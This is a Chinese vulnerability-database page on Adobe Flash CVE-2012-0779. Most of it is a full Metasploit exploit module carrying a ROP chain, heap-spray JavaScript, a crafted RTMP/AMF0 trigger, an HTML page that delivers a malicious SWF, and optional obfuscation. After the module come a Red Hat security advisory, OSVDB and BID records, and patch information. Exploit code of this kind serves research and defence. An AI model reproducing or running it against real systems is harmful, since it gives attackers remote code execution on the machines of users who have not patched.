
Adobe Flash Player Object Type Confusion (PacketStormID:F114107)
2012-06-23 00:00:00
sinn3r,juan vazquez  metasploit.com
exploit,remote,arbitrary,code execution
CVE-2012-0779,OSVDB-81656
[点击下载]

This Metasploit module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 "_error" response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the "World Uyghur Congress Invitation.doc" e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn

	autopwn_info({
		:os_name    => OperatingSystems::WINDOWS,
		:ua_name    => HttpClients::IE,
		:ua_minver  => "6.0",
		:ua_maxver  => "8.0",
		:method     => "GetVariable",
		:classid    => "ShockwaveFlash.ShockwaveFlash",
		:rank       => NormalRanking, # reliable memory corruption
		:javascript => true
	})

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Adobe Flash Player Object Type Confusion",
			'Description'    => %q{
				This module exploits a vulnerability found in Adobe Flash
				Player.  By supplying a corrupt AMF0 "_error" response, it
				is possible to gain arbitrary remote code execution under
				the context of the user.

				This vulnerability has been exploited in the wild as part of
				the "World Uyghur Congress Invitation.doc" e-mail attack.
				According to the advisory, 10.3.183.19 and 11.x before
				11.2.202.235 are affected.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'sinn3r', # Metasploit module
					'juan vazquez' # Metasploit module
				],
			'References'     =>
				[
					[ 'CVE', '2012-0779' ],
					[ 'OSVDB', '81656'],
					[ 'BID', '53395' ],
					[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-09.html'], # Patch info
					[ 'URL', 'http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html' ]
				],
			'Payload'        =>
				{
					#'Space'    => 1024,
					'BadChars' => "\x00"
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Flash Player 11.2.202.228
					[ 'Automatic', {} ],
					[
						'IE 6 on Windows XP SP3',
						{
							'Rop'    => nil,
							'RandomHeap' => false,
							'Offset' => '0x0'
						}
					],
					[
						'IE 7 on Windows XP SP3',
						{
							'Rop'    => nil,
							'RandomHeap' => false,
							'Offset' => '0x0'
						}
					],
					[
						'IE 8 on Windows XP SP3 with msvcrt ROP',
						{
							'Rop' => :msvcrt,
							'RandomHeap' => false,
							'Offset' => '238',
							'StackPivot' => 0x77c12100, # add esp, edx # retn 77 # from msvcrt.dll
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 04 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
				OptAddress.new('RTMPHOST', [ true, "The local host to RTMP service listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
				OptPort.new('RTMPPORT',    [ true, "The local port to RTMP service listen on.", 1935 ]),
			], self.class
		)

	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1]  #IE 6 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[2]  #IE 7 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
			return targets[3]  #IE 8 on Windows XP SP3
		else
			return nil
		end
	end

	def junk(n=4)
		return rand_text_alpha(n).unpack("V").first
	end

	def nop
		return make_nops(4).unpack("V").first
	end

	def ret(t)
		return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
	end

	def popret(t)
		return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
	end

	def get_rop_chain(t)

		# ROP chains generated by mona.py - See corelan.be
		print_status("Using msvcrt ROP")
		rop =
			[
				0x77c4e392,  # POP EAX # RETN
				0x77c11120,  # <- *&VirtualProtect()
				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
				junk,
				0x77c2dd6c,
				0x77c4ec00,  # POP EBP # RETN
				0x77c35459,  # ptr to 'push esp #  ret'
				0x77c47705,  # POP EBX # RETN
				0x00001000,  # EBX
				0x77c3ea01,  # POP ECX # RETN
				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
				0x77c46100,  # POP EDI # RETN
				0x77c46101,  # ROP NOP (-> edi)
				0x77c4d680,  # POP EDX # RETN
				0x00000040,  # newProtect (0x40) (-> edx)
				0x77c4e392,  # POP EAX # RETN
				nop,         # NOPS (-> eax)
				0x77c12df9,  # PUSHAD # RETN
			].pack("V*")

		code = ret(t)
		code << rand_text(119)
		code << rop
		code << "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem
		code << payload.encoded
		offset = 2616 - code.length
		code << rand_text(offset)
		code << [ t['StackPivot'] ].pack("V")
		return code
	end

	def get_easy_spray(t, js_code, js_nops)

		spray = <<-JS
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;

		var offset = nops.substring(0, #{t['Offset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);


		heap_obj.gc();
		for (var z=1; z < 0x185; z++) {
			heap_obj.alloc(block);
		}

		JS

		return spray

	end


	def get_aligned_spray(t, js_rop, js_nops)

		spray = <<-JS

		var heap_obj = new heapLib.ie(0x20000);
		var nops = unescape("#{js_nops}");
		var rop_chain = unescape("#{js_rop}");

		while (nops.length < 0x80000) nops += nops;

		var offset = nops.substring(0, #{t['Offset']});
		var shellcode = offset + rop_chain + nops.substring(0, 0x800-offset.length-rop_chain.length);


		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);


		heap_obj.gc();
		for (var z=1; z < 0x1c5; z++) {
			heap_obj.alloc(block);
		}

		JS

		return spray

	end

	def exploit
		@swf = create_swf

		# Boilerplate required to handled pivoted listeners
		comm = datastore['ListenerComm']
		if comm == "local"
			comm = ::Rex::Socket::Comm::Local
		else
			comm = nil
		end

		@rtmp_listener = Rex::Socket::TcpServer.create(
			'LocalHost' => datastore['RTMPHOST'],
			'LocalPort' => datastore['RTMPPORT'],
			'Comm'      => comm,
			'Context'   => {
				'Msf'        => framework,
				'MsfExploit' => self,
			}	
		)
				
		# Register callbacks
		@rtmp_listener.on_client_connect_proc = Proc.new { |cli|
			add_socket(cli)
			print_status("#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to RTMP")
			on_rtmp_connect(cli)
		}

		@rtmp_listener.start

		super
	end

	def my_read(cli,size,timeout=nil)
		if timeout.nil?
			timeout = cli.def_read_timeout
		end

		buf = ""
		::Timeout::timeout(timeout) {
			while buf.length < size
			buf << cli.get_once(size - buf.length)
			end
		}
		buf
	end

	def do_handshake(cli)
		c0 = my_read(cli, 1)
		c1 = my_read(cli, 1536) # HandshakeSize => 1536
		s0 = "\3" # s0
		s1 = Rex::Text.rand_text(4) # s1.time
		s1 << "\x00\x00\x00\x00" # s1.zero
		s1 << Rex::Text.rand_text(1528) # s1.random_data
		s2 = c1 # s2
		cli.put(s0)
		cli.put(s1)
		cli.put(s2)
		c2 = my_read(cli, 1536) # C2 (HandshakeSize => 1536)
	end

	def on_rtmp_connect(cli)

		begin
			do_handshake(cli)
			request = my_read(cli, 341) # connect request length

			case request
			when /connect/
				rtmp_header = "\x03" # Chunk Stream ID
				rtmp_header << "\x00\x00\x00" # Timestamp
				rtmp_header << "\x00\x00\x71" # Body Size
				rtmp_header << "\x14" # AMF0 Command
				rtmp_header << "\x00\x00\x00\x00" # Stream ID

				# String
				rtmp_body = "\x02" # String
				rtmp_body << "\x00\x06" # String length
				rtmp_body << "\x5f\x65\x72\x72\x6f\x72" # String: _error
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << "\x40\x00\x00\x00\x00\x00\x00\x00" # Number
				# Array
				rtmp_body << "\x0a" # AMF Type: Array
				rtmp_body << "\x00\x00\x00\x05" # Array length: 5
				# Array elements
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Crafter Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x0c\x0c\x0c\x0c" # Modify the "\x0c\x0c\x0c\x0c" to do an arbitrary call
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") +  "\x00\x00\x00\x00" # Number

				trigger = rtmp_header
				trigger << rtmp_body

				cli.put(trigger)
				@rtmp_listener.close_client(cli)
			end
		rescue
		ensure
			@rtmp_listener.close_client(cli)
			remove_socket(cli)
		end

	end

	def cleanup
		super
		return if not @rtmp_listener
		
		begin
			@rtmp_listener.deref if @rtmp_listener.kind_of?(Rex::Service)
			if @rtmp_listener.kind_of?(Rex::Socket)
				@rtmp_listener.close
				@rtmp_listener.stop
			end
			@rtmp_listener = nil
		rescue ::Exception
		end
	end

	def on_request_uri(cli, request)

		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported: #{agent}")
			send_not_found(cli)
			return
		end

		print_status("Client requesting: #{request.uri}")

		if request.uri =~ /\.swf$/
			print_status("Sending Exploit SWF")
			send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
			return
		end

		p = payload.encoded
		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))

		if not my_target['Rop'].nil?
			js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
			js = get_aligned_spray(my_target, js_rop, js_nops)
		else
			js = get_easy_spray(my_target, js_code, js_nops)
		end

		js = heaplib(js, {:noobfu => true})

		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end

		swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
		swf_uri << "/#{rand_text_alpha(rand(6)+3)}.swf"

		if datastore['RTMPHOST'] == '0.0.0.0'
			rtmp_host = Rex::Socket.source_address('1.2.3.4')
		else
			rtmp_host = datastore['RTMPHOST']
		end

		rtmp_port = datastore['RTMPPORT']

		html = %Q|
		<html>
		<head>
		<script>
		#{js}
		</script>
		</head>
		<body>
		<center>
		<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
		id="test" width="1" height="1"
		codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
		<param name="movie" value="#{swf_uri}" />
		<param name="FlashVars" value="var1=#{rtmp_host}&var2=#{rtmp_port}"
		<embed src="#{swf_uri}" quality="high"
		width="1" height="1" name="test" align="middle"
		allowNetworking="all"
		type="application/x-shockwave-flash"
		pluginspage="http://www.macromedia.com/go/getflashplayer"
		FlashVars="var1=#{rtmp_host}&var2=#{rtmp_port}">
		</embed>

		</object>
		</center>

		</body>
		</html>
		|

		html = html.gsub(/^\t\t/, '')

		print_status("Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end

	def create_swf
		path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0779.swf" )
		fd = ::File.open( path, "rb" )
		swf = fd.read(fd.stat.size)
		fd.close

		return swf
	end

end

=begin

* Flash Player 11.2.202.228

(348.540): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000
eip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050202
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]
ds:0023:44444470=????????

0:000> u eip
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]
104b1b30 53              push    ebx
104b1b31 ffd0            call    eax

=end
    

- 漏洞信息 (F112990)

Red Hat Security Advisory 2012-0688-01 (PacketStormID:F112990)
2012-05-24 00:00:00
Red Hat  
advisory,web,arbitrary
linux,redhat
CVE-2012-0779
[点击下载]

Red Hat Security Advisory 2012-0688-01 - The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. This update fixes one vulnerability in Adobe Flash Player. This vulnerability is detailed on the Adobe security page APSB12-09, listed in the References section. Specially-crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the specially-crafted SWF content. All users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 10.3.183.19.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Critical: flash-plugin security update
Advisory ID:       RHSA-2012:0688-01
Product:           Red Hat Enterprise Linux Extras
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2012-0688.html
Issue date:        2012-05-23
CVE Names:         CVE-2012-0779 
=====================================================================

1. Summary:

An updated Adobe Flash Player package that fixes one security issue is now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.

The Red Hat Security Response Team has rated this update as having critical
security impact. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available from the CVE link in
the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64

3. Description:

The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.

This update fixes one vulnerability in Adobe Flash Player. This
vulnerability is detailed on the Adobe security page APSB12-09, listed in
the References section. Specially-crafted SWF content could cause
flash-plugin to crash or, potentially, execute arbitrary code when a victim
loads a page containing the specially-crafted SWF content. (CVE-2012-0779)

All users of Adobe Flash Player should install this updated package, which
upgrades Flash Player to version 10.3.183.19.

4. Solution:

Before applying this update, make sure all previously-released errata
relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258

5. Bugs fixed (http://bugzilla.redhat.com/):

819003 - CVE-2012-0779 flash-plugin: arbitrary code execution via object confusion (APSB12-09)

6. Package List:

Red Hat Enterprise Linux Desktop Supplementary (v. 5):

i386:
flash-plugin-10.3.183.19-1.el5.i386.rpm

x86_64:
flash-plugin-10.3.183.19-1.el5.i386.rpm

Red Hat Enterprise Linux Server Supplementary (v. 5):

i386:
flash-plugin-10.3.183.19-1.el5.i386.rpm

x86_64:
flash-plugin-10.3.183.19-1.el5.i386.rpm

Red Hat Enterprise Linux Desktop Supplementary (v. 6):

i386:
flash-plugin-10.3.183.19-1.el6.i686.rpm

x86_64:
flash-plugin-10.3.183.19-1.el6.i686.rpm

Red Hat Enterprise Linux Server Supplementary (v. 6):

i386:
flash-plugin-10.3.183.19-1.el6.i686.rpm

x86_64:
flash-plugin-10.3.183.19-1.el6.i686.rpm

Red Hat Enterprise Linux Workstation Supplementary (v. 6):

i386:
flash-plugin-10.3.183.19-1.el6.i686.rpm

x86_64:
flash-plugin-10.3.183.19-1.el6.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package

7. References:

https://www.redhat.com/security/data/cve/CVE-2012-0779.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb12-09.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>.  More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)

iD8DBQFPvKXzXlSAg2UNWIIRAqaqAKCS5KXp2ShcerttnPyE9rBOo/PQeQCeMJvO
Z4wtYL99s3Eifb3p+HVMqj8=
=tMiQ
-----END PGP SIGNATURE-----


--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
    

- 漏洞信息

81656
Adobe Flash Player Object Confusion Unspecified Remote Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS, Upgrade
Exploit Private, Virus / Malware Vendor Verified, Discovered in the Wild

- 漏洞描述

Adobe Flash Player contains a flaw related to object confusion that may allow a remote attacker to execute arbitrary code. No further details have been provided.

- 时间线

2012-05-04 Unknow
2012-06-25 2012-05-04

- 解决方案

Upgrade to version 11.2.202.235 or higher (11.1.115.8 or 11.1.111.9 for Android), as it has been reported to fix this vulnerability. In addition, Adobe has released a patch for some older versions.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Adobe Flash Player CVE-2012-0779 Object Type Confusion Remote Code Execution Vulnerability
Unknown 53395
Yes No
2012-05-04 12:00:00 2012-08-03 10:32:00
Microsoft Vulnerability Research

- 受影响的程序版本

SuSE SUSE Linux Enterprise Desktop 11 SP2
+ Linux kernel 2.6.5
SuSE SUSE Linux Enterprise Desktop 11 SP1
+ Linux kernel 2.6.5
Red Hat Enterprise Linux Workstation Supplementary 6
Red Hat Enterprise Linux Supplementary 5 server
Red Hat Enterprise Linux Server Supplementary 6
Red Hat Enterprise Linux Desktop Supplementary 6
Red Hat Enterprise Linux Desktop Supplementary 5 client
Adobe Flash Player 10.1.53 .64
Adobe Flash Player 10.1.51 .66
Adobe Flash Player 10.0.45 2
Adobe Flash Player 10.0.45 2
Adobe Flash Player 10.0.45 2
Adobe Flash Player 10.0.32 18
Adobe Flash Player 10.0.22 .87
Adobe Flash Player 10.0.15 .3
Adobe Flash Player 10.0.12 .36
Adobe Flash Player 10.0.12 .35
Adobe Flash Player 11.2.202.233
Adobe Flash Player 11.2.202.229
Adobe Flash Player 11.2.202.229
Adobe Flash Player 11.2.202.228
Adobe Flash Player 11.2.202.223
Adobe Flash Player 11.1.115.7
Adobe Flash Player 11.1.115.6
Adobe Flash Player 11.1.112.61
Adobe Flash Player 11.1.111.8
Adobe Flash Player 11.1.111.7
Adobe Flash Player 11.1.111.6
Adobe Flash Player 11.1.111.5
Adobe Flash Player 11.1.102.63
Adobe Flash Player 11.1.102.62
Adobe Flash Player 11.1.102.55
Adobe Flash Player 11.1.102.228
Adobe Flash Player 11.0.1.152
Adobe Flash Player 10.3.186.7
Adobe Flash Player 10.3.186.6
Adobe Flash Player 10.3.186.3
Adobe Flash Player 10.3.186.2
Adobe Flash Player 10.3.185.25
Adobe Flash Player 10.3.185.23
Adobe Flash Player 10.3.185.22
Adobe Flash Player 10.3.185.22
Adobe Flash Player 10.3.185.21
Adobe Flash Player 10.3.183.7
Adobe Flash Player 10.3.183.5
Adobe Flash Player 10.3.183.4
Adobe Flash Player 10.3.183.10
Adobe Flash Player 10.3.181.34
Adobe Flash Player 10.3.181.26
Adobe Flash Player 10.3.181.23
Adobe Flash Player 10.3.181.22
Adobe Flash Player 10.3.181.16
Adobe Flash Player 10.3.181.16
Adobe Flash Player 10.3.181.14
Adobe Flash Player 10.2.159.1
Adobe Flash Player 10.2.157.51
Adobe Flash Player 10.2.156.12
Adobe Flash Player 10.2.154.28
Adobe Flash Player 10.2.154.27
Adobe Flash Player 10.2.154.25
Adobe Flash Player 10.2.154.24
Adobe Flash Player 10.2.154.18
Adobe Flash Player 10.2.154.13
Adobe Flash Player 10.2.153.1
Adobe Flash Player 10.2.152.33
Adobe Flash Player 10.2.152.32
Adobe Flash Player 10.2.152.21
Adobe Flash Player 10.2.152
Adobe Flash Player 10.1.95.2
Adobe Flash Player 10.1.95.2
Adobe Flash Player 10.1.95.1
Adobe Flash Player 10.1.92.8
Adobe Flash Player 10.1.92.10
Adobe Flash Player 10.1.92.10
Adobe Flash Player 10.1.85.3
Adobe Flash Player 10.1.82.76
Adobe Flash Player 10.1.52.15
Adobe Flash Player 10.1.52.14.1
Adobe Flash Player 10.1.106.16
Adobe Flash Player 10.1.105.6
Adobe Flash Player 10.1.102.65
Adobe Flash Player 10.1.102.64
Adobe Flash Player 10.0.42.34
Adobe Flash Player 10.0.32.18
Adobe Flash Player 10
Adobe Flash Player 11.2.202.235
Adobe Flash Player 11.1.115.8
Adobe Flash Player 11.1.111.9

- 不受影响的程序版本

Adobe Flash Player 11.2.202.235
Adobe Flash Player 11.1.115.8
Adobe Flash Player 11.1.111.9

- 漏洞讨论

Adobe Flash Player is prone to a remote code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

The following versions are affected:

Adobe Flash Player 11.2.202.233 and prior versions for Windows, Mac OS and Linux operating systems
Adobe Flash Player 11.1.115.7 and prior versions for Android 4.x
Adobe Flash Player 11.1.111.8 and prior versions for Android 3.x and 2.x

- 漏洞利用

Reports indicates this issue is being actively exploited in the wild.

The following exploit is available:

- 解决方案

Updates are available. Please see the references for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站